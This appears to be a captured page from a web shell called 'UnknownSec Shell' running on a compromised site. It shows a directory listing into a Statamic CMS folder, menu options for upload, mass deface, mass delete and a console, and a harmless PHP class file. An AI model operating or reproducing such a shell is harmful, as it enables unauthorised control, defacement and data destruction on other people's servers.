shell bypass 403
UnknownSec Shell
:
/
home
/
forge
/
lolas.brannanatkinson.com
/
vendor
/
statamic
/
cms
/
src
/
Ignition
/ [
drwxrwxr-x
]
upload
mass deface
mass delete
console
info server
name :
Value.php
<?php namespace Statamic\Ignition; use Statamic\Fields\Value as FieldValue; class Value { protected $raw; protected $augmented; protected $fieldtype; public function __construct(FieldValue $value) { $this->raw = $value->raw(); $this->augmented = $value->value(); $this->fieldtype = optional($value->fieldtype())->handle(); } }
© 2026 UnknownSec